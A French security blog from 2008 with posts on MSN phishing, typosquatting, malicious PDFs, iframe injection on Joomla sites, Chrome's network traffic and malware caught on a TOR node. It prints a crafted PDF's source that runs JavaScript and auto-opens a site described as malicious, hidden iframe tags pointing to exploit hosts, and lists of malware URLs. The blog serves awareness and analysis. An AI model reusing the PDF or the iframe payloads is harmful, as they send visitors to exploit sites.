Overblog
Suivre ce blog Administration + Créer mon blog
23 novembre 2008 7 23 /11 /novembre /2008 18:13

Cette fois-ci je n'étais même pas en mode "grandes oreilles" quand une fenêtre intempestive a surgit sur mon bureau.

 

Précisons, la configuration est un Vista SP1, avec KIS 2009 et Pidgin pour la messagerie instantannée.

 

Voici à quoi ressemblait la fenêtre publicitaire (lien )

 

 

Un contact en mode "hors ligne" qui m'envoie un lien... étrange... (comme on dirait en anglais "sounds familiar, doesn't it?").

 

Le site en question demandait des identifiants MSN et ... les mots de passe pour se connecter à une partie à accès restreint...

 

Or le lendemain de l'affaire (23/11/08), si l'on va sur le site en question, voici ce qui apparaît :

 

Tiens donc, ces chers amis de SearchPortal... !

 

Cependant on dirait qu'il y a bien anguille sous roche puisque le domaine hopto.org est référencé comme malveillant, par exemple ici : http://www.malwaredomains.com/files/domains.txt  et parfois depuis 2005 ! (raison indiquée : "botnet")...

 

 

Affaire à suivre, j'espère avoir des captures d'écran du fameux site diffusé via MSN.

 

 

Mise à jour du 29/11/08 (20h50) :

 

Nouvelle campagne de diffusion via MSN (autre contact que précédemment). . Cette fois-ci le site est : http://tinyurl.com/578kt2

 

Voici une capture du message (lien externe) :

 

 

 

En fait, cette URL diffusée sur MSN redirige de manière transparente sur un autre domaine : http://8685858.getenjoyment.net

Il s'agit d'un site porno !  

 

Je ne ferai pas de capture d'écran ;)


Il est drôle de noter le contenu hébergé sur leur sous-domaine "www" : http://www.getenjoyment.net/
Ecrit en bon français...  S'agit-il réellement du début d'une encyclopédie technique sur Internet...?

Le lendemain, ce site n'est déjà plus accessible...
- Google Chrome renvoie sur http://host.atwebpages.com/web_hosting_needs.html
- Firefox, via OpenDNS, renvoie sur une page d'erreur : http://guide.opendns.com/?url=8685858.getenjoyment.net


A quand la suivante...

 

Partager cet article

Repost0
30 octobre 2008 4 30 /10 /octobre /2008 23:06

Ha le problème de la faute de frappe...
Combien de collègues avons-nous entendu râler car ils venaient de faire une faute en tapant au clavier... (ex : "doigts carrés à la noix...").

Qu'est-ce que le typo-squatting, alias parasitage de nom de domaine Internet ?
C'est réserver un nom de domaine proche d'un nom connu (vous avez dit Google ?) mais avec une variante dans la syntaxe. Cette variance est censée correspondre à une faute de frappe que peut faire un utilisateur en allant visiter le site connu (www. google .fr).
Evidemment, si l'utilisateur fait réellement cette faute de frappe, et que le nom de domaine a été réservé, il n'y aura pas d'erreur affichée dans le navigateur... l'utilisateur sera envoyée sur une page de façon totalement arbitraire !
En un sens, on peut considérer que le typosquatting est proche du cyberquatting. Sauf que le cas du "typo" est que l'on vise indirectement une société, on ne réserve pas le nom de domaine correspondant exactement à la marque...
Ex de cybersquatting :
http://www.france2.com/, il y a 2 mois encore un site pornographique ! . Idem pour france3.com.
L'un des cas certainement les plus connus pourrait être "whitehouse.com", qui est resté pendant des années... un site porno.

Le fait de réserver un nom de domaine dont la syntaxe varie légèrement du domaine de la vraie cible, fait que ces enregitrements de noms de domaines parasites sont bien plus difficiles à détecter.


La surveillance de ce type de malveillance peut faire partie d'une activité de veilleur sécurité, mais je trouve que certains cas méritent d'être diffusés plus largement, pour information et sensibilisation.

Voici donc quelques exemples du genre, qui me semblent intéressants (je prends la cible type : Google) :

- googllle.com : fausse page de recherche, page "générique"... mais on note le "copyright googlle.com" en bas de page !

- qoogle.com : assez drôle, on est renvoyé vers ce qui semble être un vrai google, mais l'URL est : http://www.sohaibkhan.com/ ...  (encore un site à rajouter aux systèmes de filtrage Internet, pour certains...)

- http://qooqle.com/  : en voici un vrai, complet !!!  ce site affiche une interface utilisateur de type moteur de recherche, mais ce n'est pas Google !! Les résultats de recherche, comme "mp3" donnent des résultats totalement différents. Ce qui fait la force de cet exemple, c'est l'utilisation du "q" à la place du "g". Ceci, dans une mise en page où les liens Internet sont généralement soulignés, fait que l'utilisateur ne verra pas la différence entre les 2 lettres ! (idem pour l'exemple précédent).

- http://www.qoogle.fr/   qu'est-ce donc ? le jeu avec Google semble clair !  pourquoi le WhoIS est-il en mode anonyme ? http://www.whois.net/whois_new.cgi?d=qoogle&tld=fr


-----------

Même des sites parlant de sécurité se font viser !!


- http://www.avcomparative.org/   le fameux site de comparaison de solutions antivirales... il est plutôt drôle de constater que dans cette page, justement, on trouve des liens pour acheter des solutions comme Norton, AVAST, NOD32, PCTools...   comme on dit, l'argent n'a pas d'odeur... ?


- http://pagejaune.com   les PagesJaunes sont certainement l'un des sites les plus utilisés en France. Et là, je parle de dévu, un de mes proches a voulu aller sur le site des PagesJaunes, et a tapé cette adresse... évidemment ce fut un peu dur à expliquer, mais tellement réaliste !!



Ceci ne fait que démontrer à nouveau (s'il en était besoin) la nécessité d'avoir un filtrage Internet
- sur URL
- sur le contenu, incluant antivirus.
Il ne faut pas oublier que les utilisateurs ne feront pas forcément exprès d'aller sur des sites malveillants

Partager cet article

Repost0
24 octobre 2008 5 24 /10 /octobre /2008 00:32
De récentes investigations sur les nouveaux vecteurs viraux, m'ont amené à m'interroger et me documenter sur les problématiques liées aux fichiers PDF.

Depuis longtemps, pour ne pas dire depuis le début, ce format (PDF) a été considéré comme "sûr".
En fait, il garantissait surtout une impression conforme à la mise en forme originale du document, lors de sa création.


Je tiens donc à recommander les lectures suivantes concernant les PDF :
- le blog de Didier Stevens
- cet article évoquant la course actuelle au PDF "malveillant"


Fort de ces lectures et de mes propres recherches, je vous fournis le PDF suivant :
- embarque un EICAR, généré à la demande via un bouton dans le document.
- si ouvert sur une version 7 (7.0 par exemple), le PDF provoque l'ouverture du navigateur par défaut de la machine, et l'envoie sur un site russe malveillant (qui tente d'exploiter diverses failles sur le navigateur, voire sur la machine Java selon les cas).


Attention, ce PDF est réellement dangereux si vous ne prenez pas de précauions !
Je le livre à fins de recherche, de validations d'applications de correctifs (voire de réglages sécurité) sur Acrobat Reader, ainsi que dans un but démonstratif et de sensibilisation.
Je ne peux être tenu pour responsable des éventuels dommages que subirait votre système informatique si vous ne prenez pas les précautions nécessaires lors de l'utilisation de ce PDF.



----------------------------------------------------------------------------
%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 12 0 R
 /Names << /EmbeddedFiles << /Names [(EICAR.txt) 9 0 R] >> >>
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Annots [7 0 R]
 /Resources <<
             /ProcSet [/PDF /Text]
             /Font << /F1 6 0 R >>
            >>
>>
endobj

5 0 obj
<< /Length 427 >>
stream
BT /F1 12 Tf 70 700 Td 15 TL
(CE PDF A l'AIR INNOCENT, POURTANT IL EMBARQUE 2 CHARGES VIRALES !) Tj
<58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A> '
() '
(Il suffit de cliquer a l'interieur du rectangle pour lancer la generation de EICAR.) '
() '
(Click here) '
ET

endstream
endobj

6 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

7 0 obj
<<
 /Type /Annot
 /Subtype /Link
 /Rect [65 620 130 640]
 /Border [16 16 1]
 /A 8 0 R
>>
endobj

8 0 obj
<<
 /Type /Action
 /S /JavaScript
 /JS (this.exportDataObject({ cName: "EICAR.txt", nLaunch: 2 });)
>>
endobj

9 0 obj
<<
 /Type /Filespec
 /F (EICAR.txt)
 /EF << /F 10 0 R >>
>>
endobj

10 0 obj
<<
 /Type /#45mbeddedFile
 /Length 208
 /Filter /ASCIIHexDecode
>>
stream
58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A>
endstream
>>
endobj

12 0 obj
<<
 /Type /Action
 /S /URI
 /URI (http://hancockparkschool.org)
>>
endobj


xref
0 11
0000000000 65535 f
0000000012 00000 n
0000000152 00000 n
0000000208 00000 n
0000000277 00000 n
0000000500 00000 n
0000000986 00000 n
0000001110 00000 n
0000001225 00000 n
0000001352 00000 n
0000001436 00000 n
trailer
<<
 /Size 11
 /Root 1 0 R
>>
startxref
1763
%%EOF

-------------------------------------------------------------------------------------

Détection antivirale de cette page :

J'ai été informé que cette page (mon blog) était détectée par Avira Antivir :
http://original.avira.com/fr/threats/JS_Dldr_Agent_BJZ_details.html
Alors, non, il ne s'agit pas du PDF !
La raison est que j'ai laissé en clair des liens vers des serveurs malveillants (article précédent) notamment le faux "msn analytics". Antivir annonce un script, alors qu'il n'y en a pas dans la page ! (iframe désactivées par syntaxe volontairement erronnée)
Il semble donc qu'Antivir se base sur une simple détection d'URL dans du texte simple...

Partager cet article

Repost0
18 octobre 2008 6 18 /10 /octobre /2008 00:37
L'opérateur serait-il victime de son succès ?

A l'heure où j'écris ces lignes, la recherche Google est inaccessible via l'accès 3G+ d'un mobile SFR.

On obtient le message suivant (depuis 23h environ) :

Your request could not be processed because an error occurred contacting the DNS server. The DNS server may be temporarily unavailable, or there could be a network problem.
For assistance, contact your network support team.

Un message plutot limpide pour l'utilisateur "lambda"...

Est-ce que SFR aurait un problème de DNS ? une migration qui se passe mal ?

Affaire à suivre. Mais il est fort à parier que "plus de google" ne passe pas aperçu dans un monde informatique où les internautes ne connaissent plus Internet sans Goooogle...


Partager cet article

Repost0
17 octobre 2008 5 17 /10 /octobre /2008 01:19
Décidément, les cibles des attaques informatiques se diversifient de plus en plus, pour toucher des environnements ou des outils qu'on se soupçonnerait pas d'être visés...

Voici quelques éléments, concernant ce qui semble être une attaque visant Joomla! .
Au passage, un organisme spécialisé dans la veille virale m'a confirmé des attaques en cours contre Joomla!.

L'attaque semble consister à insérer une ou plusieurs balises iFrame dans le code du site piraté.

Ces balises pointent sur (entre autres) :
- http://wsx2host.net/count.php?o=
- http://pinoc.org/exploits/x7b.php
- msn-analytics.net/count.php?o=2

La recherche Google d'un de ces liens "malins" paraît également intéressante, et tend à montrer une réelle campagne d'attaque en cours :
http://www.google.fr/search?q=msn-analytics.net&btnG=Rechercher&hl=fr&rlz=1C1GGLS_frFR291&sa=2
On peut voir des administrateurs / webmasters qui ne comprennent pas ce qui arrive à leur site... et c'est souvent les utilisateurs qui leur signalent la présence du lien dangereux dans le code de leurs pages.
Les administrateurs suppriment le code malin, mais celui-ci revient souvent.


Exemple de balises iFrames injectées sur des sites (avec Joomla!) vulnérables :
iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe><?iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe>


On pourra noter la ressemblance entre : google-analytics.com et    ... msn-analytics.net !!
Est-ce volontaire ? le nom de cette balise est-il conçu ainsi pour sembler "inoffensif" à première vue ?
On peut se poser la question.

D'ailleurs, les équipes de MSN pourraient attaquer le propriétaire de ce site (msn-analytics.net), car "msn" est une marque déposée... et il semble que Google pourrait également attaquer sur le terme "analytics" :
http://www.google.com/analytics/tos.html
Lequel des 2 est visé réellement, mystère... peut-être les 2 ?


Détails concernant msn-analytics.net :


Avertissement de sécurité :
http://safeweb.norton.com/report/show?url=msn-analytics.net

Le WhoIs sur le site de la CNIL ne semble pas donner de réponse probante pour ce domaine. Heureusement, d'autres WhoIs semblent eux le connaitre :
http://www.whois.net/whois_new.cgi?d=msn-analytics&tld=net

On pourra noter que la date d'enregistrement du domaine est très récente, il semble donc qu'on ait affaire à une campagne également récente...

Mise à jour du 30/10/08 :

Des tests montrent que l'exploit tenté par le site "msn analytics", tout comme les 2 autres visiblement, concerne une vulnérabilité sur QuickTime.
La dernière version (7.5.5) en date de QuickTime ne s'est pas révélée vulnérable lors de la navigation sur le site.
De même, la version 7.2 ne s'est pas montrée vulnérable, tout comme la 7.1.6.
Je n'ai pas eu le temps de faire des tests avec les versions 6...

Cependant, on peut se poser les questions suivantes : s'agit-il d'une erreur dans la mise en place de l'exploitation de faille, peut-être que les éléments d'attaque ne sont pas tous opérationnels ? ou s'agit-il réellement de l'utilisation d'une ancienne faille (ce qui semble étonnant vu la récence de la campagne d'attaque des Joomla...).



Bref, encore une raison de :
- scanner les flux HTTP au niveau antiviral (passerelles ou postes, selon l'architecture)
- scanner en local les pages d'un serveur Web, ne serait-ce que de nuit (dans un Cron par exemple et avec un ClamAV... pour Unix / Linux). On peut également envisager simplement un contrôle d'intégrité de ces pages...
- ne pas cliquer sur tout lien dès l'instant qu'il contient 1 mot clé "connu"  (type "msn")....

Partager cet article

Repost0
17 septembre 2008 3 17 /09 /septembre /2008 23:49
Allez, autant pour l'info que pour la bonne blague, je poste un message sur le sujet.

Depuis quelques temps, sur mes propres machines, ainsi que sur des machines neuves achetées dans le commerce, il semble que Windows Live Messenger (dernière version) plante allègrement sous Vista SP1... dès qu'on entre ses identifiants Live Mail, et qu'on lance la connexion...


Après investigation (je passe les détails sur tous les tests menés... allant jusqu'à l'ajout de RAM !), il apparaît que :

- si l'on active le mode "administrateur" pour le lancement de Win Live Messenger, un assistant d'installation apparaît, soit-disant pousuit une installation, et se termine.

- Après lancement, donc en mode administrateur, Windows Live Messenger ne plante plus !

- si l'on désactive l'attribution automatique et forcée des droits d'administration à Live Messenger, alors il recommence à planter dès l'ouverture de session !



Alors les questions qui viennent :

Quid de l'UAC, une des grandes (fameuses !) fonctions de sécurité arrivées avec Vista, qui témoigne d'une gestion des processus avec des privilèges faibles par défaut ?  

Doit-on forcer MSN en mode administrateur ?   quid du risque viral !!
avec le nombre de codes viraux se propageant par ce biais, en plus des failles de sécurité... tout va bien.

N'est-il pas connu du monde Unix, depuis des années déjà, qu'il est largement préférable de faire tourner des processus avec des comptes restreints en droits ? (Evidemment que oui...)

Vista a-t-il tranché du modèle Microsoft en implémentant ce modèle de gestion des processus ? Oui....

MAIS !
Que doit-on faire quand même les applications Microsoft, grand public, parmi les plus connues, plantent sauvagement sans privilèges administrateur ???


[humour]
Mon linux s'en retourne dans sa cage virtuelle !


Captures d'écran à venir.

Partager cet article

Repost0
2 septembre 2008 2 02 /09 /septembre /2008 21:37
Comme beaucoup d'autres visiblement, ma curiosité envers le "nouveau bébé" de Google s'est ranimée à l'annonce de la sortie du "fureteur à la Goooogle".

Je l'ai donc téléchargé et installé.

Config de test :
- Vista Pro SP1
- Firefox 3.0.1 (je précise pour la suite)
- K.I.S 2009
- DNS primaire de la machine : OpenDNS Resolver1 : 208.67.222.222
- DNS secondaire : adresse de la "boîte" ADSL : le bon vieux 192.168.1.1


Installation :

Fidèle à l'habitude de Google, c'est du "tout automatisé", dès l'instant qu'on clique sur "Accepter et installer", en validant donc de facto les conditions d'utilisation...
L'URL (la vraie) de téléchargement est la suivante :
http://dl.google.com/update2/installers/ChromeSetup.exe


On peut déjà remarquer la case à cocher (ou pas) : "Facultatif : Aidez-nous à améliorer Google Chrome en envoyant automatiquement des statistiques d'utilisation et des rapports d'erreur à Google."
Vu que l'installation se déroule de façon transparente dans le navigateur (fenêtre apparaissant au premier plan), ce clic pourrait avoir des effets sur les paramétrages directement durant l'installation de Google Chrome.

Me mettant à la place d'un utilisateur bienveillant (y compris au sein d'une Entreprise, sur un PC pro...), je décide  de cocher la fameuse case pour "aider à améliorer Google"......


1er démarrage :

Chrome a la capacité de détecter la présence de Firefox sur la machine (pas de mention de celle de Internet Explorer 7...). Chrome propose dès la fin de l'installation d'importer des informations de Firefox, notamment les favoris.
Petit couac, il faut fermer Firefox pour que cela fonctionne, alors qu'on vient justement de lancer le téléchargement + installation de Chrome... à partir de Firefox.

Passé cette étape, Chrome démarre enfin, réellement.

Et là, ce qui frappe, ce sont les nombreuses alertes du Firewall !
Voici une capture d'écran du trafic généré par Chrome, à son démarrage, alors que je n'avais demandé strictement aucune URL !   lien de la capture décran de la surveillance réseau de K.I.S 2009 si l'image ne s'affiche pas :



L'examen des logs du pare-feu peut amener à se poser des questions.
Que sont exactement les URL/IP suivantes

- TCP : ik-in-f100.google.com      |  66.249.99.100           |  port  80

- UDP :                  ?                           |  224.0.0.252               |  port 5355 ???

- TCP :                   ?                          |  74.125.77.147           |  port 443 ???

- TCP :                    ?                        |  199.7.58.72                |  port 80


Avec autant de connexions dès le démarrage, y compris en HTTPS, que fait Google ?...
Car c'est bien Google qui écoute le HTTPS sur 74.125.77.147

D'autant que le système utilisé est plutot bien pensé :
- pas ou peu de résolution de nom, ce qui complique la tâche des filtrages de contenu (ex : proxy HTTP), mais aussi réduit aussi la chance de pister ces connexions dans des rapports statistiques de navigation (une IP c'est plus discret...)
- connexion en HTTPS, qui comme on le sait, est relativement peu filtré en entreprise.
Bref, des idées afin de permettre à un maximum de données, générées par Chrome, de remonter à qui les écoute.



Etude des connexions après redémarrage de Chrome :

En fermant et ré-ouvrant G Chrome, d'autres connexions (encore plus obscures ?) apparaissent :

- TCP : 66.249.93.100
- TCP : 66.249.91.113
- TCP : 66.249.91.127
- TCP : 224.0.0.252
- TCP : 74.125.8.151
etc. !
Au passage, ces IP sont reférencées sur d'autres sites (devinez avec quoi on peut faire la recherche...).


Pas beaucoup d'informations pour ces URL... via RIPE.

Mais en cherchant différemment :  66.249.91.0 : propriétaire = Google Inc.
Idem pour 75.125.8.0

 
Cependant, il se trouve que si l'on examine un peu ces adresses, notamment 66.249.93.100, ce qui répond derrière ressemblerait à un proxy !! 
En effet, l'IP répond sur le port 80, et on peut surfer en l'indiquant comme proxy HTTP dans le navigateur...
S'agit-il de proxy d'anonymat ? pas tout à fait.

Pour être plus exact, on peut surfer avec 66.249.93.100:80 comme proxy HTTP, mais.... on ne peut aller que sur des sites hébergés directement chez Google !!

Cette pseudo liberté de navigation inclue visiblement la plupart des services de Google, tels que Google Docs, avec toujours accès personnalisé selon l'adresse GMail de l'utilisateur.
Je n'ai malheureusement pas le détail des permissions offertes par ces serveurs mandataires HTTP.

La question se pose donc : à quoi servent ces connexions sur ce qui semble être des proxies HTTP en accès restreint ?


------------------------------------------------------------------------------------------------------------------------------------------------------------

Fonctionnalités remarquables :

Google Chrome est capable de "corriger" les fautes de frappe des internautes, lorsqu'ils saisissent des URL !
Enfin un navigateur un peu intelligent sur ce point ! (ce n'est pas une nouveauté pour ceux qui ont utilisé les OpenDNS...)

Voici un petit exemple avec "meteofrance.com".
Autres exemples :

- www.googlecom = > redirigé vers recherche Google... de googlecom.

Cette fonctionnalité a des impacts assez forts à mon sens au niveau sécurité : Chrome va automatiquement proposer de "vrais sites" aux utilisateurs, si leur orthographe est proche de l'URL tapée.
Google a eu également la bonne idée de proposer la recherche sur son moteur, qui comme on le sait, corrige certaines fautes de frappe, et propose des résultats pour des sites "voisin" au niveau syntaxical.

Mais cette technologie ne permet (à priori) malheureusement pas d'éviter des cas comme :
-  www.pagejaune.com
- www.goole.com/
etc


On peut remarquer aussi que Chrome affiche en gras le nom réel du domaine où l'on navigue (en temps réel).
C'est le même principe que l'extension LocationBar de Firefox : diminuer les risques de "filouter" les utilisateurs en leur affichant en gros en gras, l'adresse réelle du site sur lequel ils sont.



===========================================================================================

Je vais m'arrêter pour un premier jet.

En résumé, il ressort que Google Chrome semble attractif, non seulement parce qu'il a l'étiquette Google, mais aussi pour ses fonctionnalités (à voir à l'usage).

Attention cependant
- au trafic réseau qu'il génère : http / https et IP distantes "anonymes"  = >  fuite d'info / suivi du trafic réseau difficile
- à son installation "transparente" et facile depuis un navigateur "quelconque" = > invasion des parcs informatiques existants...
- au bruit entourant sa sortie, qui contribue déjà à sa popularité

Une dernière petite note, en attendant confirmation par de plus amples tests : attention à la bande passante que Google Chrome demande (avec seulement 3 sites visités, je suis déjà à 7Mo de téléchargés...) !

Comme toujours, je posterai de plus amples informations dès que possible.




Partager cet article

Repost0
2 septembre 2008 2 02 /09 /septembre /2008 19:24
Suite à mes précédents messages concernant des alertes virales générées par le traffic réseau de T.O.R, j'ai décidé de regrouper ici les URL signalées par Kaspersky 2009.

J'ose espérer que cela servira à d'autres personnes, peut-être même des éditeurs...


- http://root.51113.com/root.gif : Troj-Dwnlder.Win32.Murlo.nn

- http://esearchall.com : Troj-Dwnlder.JS.IFrame.JL,
Attention, ce site semble revenir assez souvent.

- http://foto-e-mia.info/beta.com : Win32.Runner.x

- http://avwav.com/2359.htm : packed.JS.Agent.i

 - http://xzjmjd.cn/book : Troj-Dwnlder.JS.IFrame.a

- http://xsenhalol.xpg.com.br  Backdoor.php.PBot.a

- http://gzkangyuan.com/gb/ok.asp            ?


09/09/08
- http://surftillyoudrop.org/index.php?REQ=womens+health  : Troj-downloader.JS.Frame.jl

- http://oa81.com/fksave.asp  :  Trojan-Clicker.HTML.IFrame.kr

- ...


------
Détections heuristiques :

http://89.188.16.29/database : Trojan.Generic




Je posterai d'autres URL au fur et à mesure.

Partager cet article

Repost0
29 juillet 2008 2 29 /07 /juillet /2008 00:27

Je m'intéresse au système TOR depuis quelques temps déjà.
Non seulement par curiosité, mais aussi pour les risques qu'il peut amener au sein d'un SI avec des données sensibles et/ou des systèmes de filtrage de navigation...

Ne recherchant pas l'état de l'art pour TOR, j'ai simplement récupéré Vidalia, une mini-suite logicielle incluant le nécessaire pour faire fonctionner un client/serveur TOR, avec web proxy local. Le tout dans une interface assez simple et francisée !

J'ai donc laissé tourner la bête de nuit, pour observer ses stats le lendemain (l'outil de génération de stats est fourni aussi avec Vidalia...).

Cependant, il m'a semblé entendre quelques bruits étranges durant la nuit. Et au petit matin, j'ai pu apercevoir des messages d'alerte de Kaspersky sur mon PC...
Mince alors ! on aurait tenté de m'infecter de nuit, en traître, et alors que je ne faisais rien de spécial sur le PC ?




En fait, après quelques vérifications, la réponse est non...
Je n'ai jamais visité les URL que KAV m'indique dans le rapport (cf. capture ci-dessus).

Explication ?
J'ai laissé tourner Vidalia, mais cette fois-ci en étant devant le PC.
Et par chance, j'ai pu voir une alerte en temps réel. L'information qui me manquait était fournie par KAV lorsqu'il hurle pour signaler un objet dangereux :
- > le nom du résident accédant au fichier infecté est : tor.exe !!

Ainsi, K.I.S 2009 est capable d'analyser le flux véhiculé au sein du réseau TOR et transitant par le "noeud" que mon PC constitue... (infos de version : Kaspersky Internet Security 2008, v8.0.0.357).

De là à dire que TOR sert à propager des codes viraux et/ou à dissimuler des transferts de codes viraux, il n'y a qu'un petit pas...


Devrait-on généraliser des scanners antivirus sur http pour assainir le réseau TOR ? la question peut se poser...


Dans tous les cas, je pense qu'il est déjà important d'avoir à l'esprit que le fait de participer au réseau TOR (dès qu'on a installé tor, devenant un "routeur" TOR), la machine peut faire transiter des codes viraux, de façon complètement transparente...

Moi qui croyais assez peu aux scanners AV analysant les flux type HTTP en local, je dois dire que K Labs a développé une technologie qui me semble pertinente, dans le contexte viral actuel. C'est d'ailleurs pour ça que j'ai K.I.S 2009 , "en test"...




Partager cet article

Repost0
10 juillet 2008 4 10 /07 /juillet /2008 21:54
Allez juste en passant, voici un petit tuyau pour ceux qui ont du mal à passer à Vista :
http://www.desktopsidebar.com/

Quand je dis ceux qui ont du mal, je devrais dire... la plupart des populations informatisées... :(
La marche est tellement grande, qu'on parle d'une potentielle cassure avec émergence accélérée des systèmes alternatifs comme Apple ou Linux....

Par contre, je vous mets en garde contre les BricoPacks et équilalents (crystalxp.net).
Ces "packs" sont censés rapprocher l'interface graphique du système de départ (Win XP la plupart du temps), vers le système cible (qu'on aimerait avoir ??). Ainsi, on restitue les barres des fenêtres, des tâches, les effets 3D, selon le modèle que peuvent être LongHorn, Vista, ou même encore MacOS.

Cependant, mon avertsissement vient du fait qu'il s'agit d'un remplacement de certains fichiers système Windows.
Or, la version des fichiers systèmes est susceptible de changer à chaque application de correctifs de sécurité.
Pour rappel, Microsoft sort un bulletin tous les mois, avec jusqu'à une douzaine de correctifs !

Lisez bien la doc (et il y en a peu), des BricoPacks et autres packs de transformation de votre XP ("bien aimé") en Vista... vous verrez :
- SP2 pas toujours supporté (c'est un comble pourtant, il n'est pas sorti d'hier...)
- SP3, on n'en parle pas
- peu de détails sur les systèmes réellement testés
- peu de détails sur les évolutions des packs
- très peu de détails sur l'origine des fichiers utilisés pour "bidouillage" et maquillage à la Aero.



Bref, des petits outils attrayants, comme toujours, gratuits en plus, mais pas forcément innocents pour les machines !

Avec toutes les correctifs appliquables à XP (plus de 80 à ce jour, post SP2...), une machine équipée d'un bricopack peut potentiellement avoir des versions de composants systèmes complètement hétérogènes, et provoquer :
- plantage des correctifs installés automatiquement via Windows Update (du déjà vu)
- versions de fichiers non conformes et vulnérables à des failles censées être déjà corrigées...

Le genre d'outil à ne pas laisser diffuser sur des parcs d'entreprise !


A bon entendeur...

Partager cet article

Repost0